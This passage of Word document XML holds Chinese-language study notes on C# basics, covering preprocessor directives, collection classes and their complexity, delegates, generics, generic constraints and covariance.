              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>类的成员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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tabs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>只有在类的内部才能访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w: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C#常用预处理指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#region：指定一个可展开或折叠的代码块</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#endregion：它标识着 #region 块的结束</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#define： 它用于定义一系列成为符号的字符</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#undef：它用于取消定义符号</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#if、#else、#elif、#endif：用于创建复合条件指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#waring常用于#if语句中，用来提醒调试代码是否启动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>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C#集合类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线性集合：List,Queue,Stack,Dictionary,HashSet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树形结构：SortedDictionary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List按值查找和添加，删除的时间复杂度为O(n)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dictionary,HashSet按值查找和添加，删除的时间复杂度为O(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="宋体" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SortedDictionary按值查找的时间复杂度为O(logN)，它比Dictionary多了个排序的功能，但是它范围查找的事件复杂度为O(logN) + M（M为查找的个数），而Dictionary范围查找的时间复杂度为O(N)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>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委托</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Delegate、Lambda、Action、Func、Predicate、事件EventArgs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="141414"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要把方法传递给一个方法时就需要用到委托。该方法可以是普通方法，也可以是静态方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="宋体" w:cs="Helvetica Neue"/>
          <w:color w:val="141414"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>多播委托</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:color w:val="141414"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>委托也可以包含多个方法，如果使用多播委托就可以按循序调用多个方法，为此多播委托的返回值必须为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:eastAsia="宋体" w:cs="Helvetica Neue"/>
          <w:color w:val="141414"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>空</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lambda表达式，从C# 3.0开始，就有一种的新的方法实现委托的赋予：Lambda表达式。只有委托参数类型的地方，就可以使用Lambda表达式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型Action&lt;T&gt;委托表示引用一个void返回类型的方法。这个委托至多可以传递16种不同的参数类型。Action&lt;in T&gt;调用带一个参数的方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Func&lt;T&gt;顾名思义它的使用方式类似于方法，所以它允许带返回值。它也可以至多传递16个参数类型。Func&lt;out TResult&gt;可以调用带返回值且无参数的方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>事件基于委托，为委托提供了一种发布/订阅机制</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泛型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型的优势</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>主要优点是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>性能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，避免了拆箱和装箱操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>另一个优点是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类型安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，在泛型类List&lt;T&gt;中，泛型类型T定义了允许使用的类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型类型的命名规范：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>泛型类型的名称用字母T作为前缀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果没有特定要求泛型类型允许用任意类替代</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果泛型类型有特定的要求，或者使用了两个以上泛型类型，就应该给泛型类型使用描述性的名称，如：TEventArg，TValue，TKey，TInput</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个泛型类有4点需要注意的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.默认值，由于泛型类型可能是值类型(默认值0)或引用类型(默认值null)，为了解决该问题，可以使用default关键字，通过default关键字，将null赋予引用类型，0赋予值类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.约束，如果泛型类需要调用泛型类型中的方法，就必须添加约束，将T改为Txxx，并在where子句中指定实现的接口。如：public class DocumentManager&lt;TDocument&gt; where TDocument : IDocument { </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.继承，泛型类型可是现实泛型接口，也可以派生自一个类，泛型类也可以继承泛型基类，其要求是必须重复接口的泛型类型，或者必须指定基类的类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.静态成员，如：public class StaticDemo&lt;T&gt;{ public static int x}，由于同时对一个string类型和一个int类型使用了StaticDemo&lt;T&gt;类，因此存在两组静态字段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用泛型类型可以定义接口，在接口的定义中可以使用带泛型的参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范型约束</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以对范型的范围进行规定：常用的有值类型，引用类型，接口，类等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法格式为在类后面添加 where T : struct/class/接口名称/类名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>协变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>抗变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在.NET 4之前，泛型接口是不变的。.NET 4通过协变和抗变为泛型接口和泛型委托添加了一个重要拓展。协变和抗变指对参数和返回值的类型进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>协变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：协变类型用out参数标注，支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>隐式转换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以将方法的返回值设置为T，不能把T作为输入参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
